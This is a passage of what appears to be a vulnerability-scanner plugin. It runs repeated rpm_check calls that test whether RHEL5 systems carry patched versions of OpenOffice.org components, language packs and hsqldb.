(rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-hi_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hi_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-hr_HR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hr_HR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-hu_HU-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hu_HU-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-it-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-it-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ja_JP-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ja_JP-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-kn_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-kn_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ko_KR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ko_KR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-lt_LT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-lt_LT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ml_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ml_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-mr_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-mr_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ms_MY-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ms_MY-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-nb_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nb_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-nl-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nl-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-nn_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nn_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-nr_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nr_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-nso_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nso_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-or_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-or_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-pa_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pa_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-pl_PL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pl_PL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-pt_BR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pt_BR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-pt_PT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pt_PT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ru-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ru-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-sk_SK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sk_SK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-sl_SI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sl_SI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-sr_CS-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sr_CS-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ss_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ss_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-st_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-st_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-sv-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sv-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ta_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ta_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-te_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-te_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-th_TH-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-th_TH-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-tn_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-tn_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-tr_TR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-tr_TR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ts_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ts_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ur-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ur-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-ve_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ve_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-xh_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-xh_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-zh_CN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zh_CN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-zh_TW-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zh_TW-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-langpack-zu_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-zu_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-math-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-math-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-pyuno-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-pyuno-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-testtools-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-testtools-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-writer-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-writer-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"openoffice.org-xsltfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"openoffice.org-xsltfilter-2.0.4-5.4.25\")) flag++;\n\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"hsqldb-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"hsqldb-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"hsqldb-demo-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"hsqldb-demo-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"hsqldb-javadoc-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"hsqldb-javadoc-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"hsqldb-manual-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"hsqldb-manual-1.8.0.4-3jpp.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-base-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-base-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-calc-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-calc-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-core-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-core-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-draw-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-draw-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-emailmerge-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-emailmerge-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-graphicfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-graphicfilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-impress-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-impress-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-javafilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-javafilter-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-af_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-af_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ar-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ar-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-as_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-as_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-bg_BG-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-bg_BG-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-bn-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-bn-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ca_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ca_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-cs_CZ-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-cs_CZ-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-cy_GB-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-cy_GB-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-da_DK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-da_DK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-de-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-de-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-el_GR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-el_GR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-es-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-es-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-et_EE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-et_EE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-eu_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-eu_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-fi_FI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-fi_FI-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-fr-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-fr-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ga_IE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ga_IE-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-gl_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-gl_ES-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-gu_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-gu_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-he_IL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-he_IL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-hi_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hi_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-hr_HR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hr_HR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-hu_HU-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-hu_HU-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-it-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-it-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ja_JP-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ja_JP-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-kn_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-kn_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ko_KR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ko_KR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-lt_LT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-lt_LT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ml_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ml_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-mr_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-mr_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ms_MY-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ms_MY-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-nb_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nb_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-nl-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nl-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-nn_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nn_NO-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-nr_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nr_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-nso_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-nso_ZA-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-or_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-or_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-pa_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pa_IN-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-pl_PL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pl_PL-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-pt_BR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pt_BR-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-pt_PT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-pt_PT-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-ru-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-ru-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"i386\", reference:\"openoffice.org-langpack-sk_SK-2.0.4-5.4.25\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"1\", cpu:\"x86_64\", reference:\"openoffice.org-langpack-sk_SK-2.0.4-5.4.25\")) 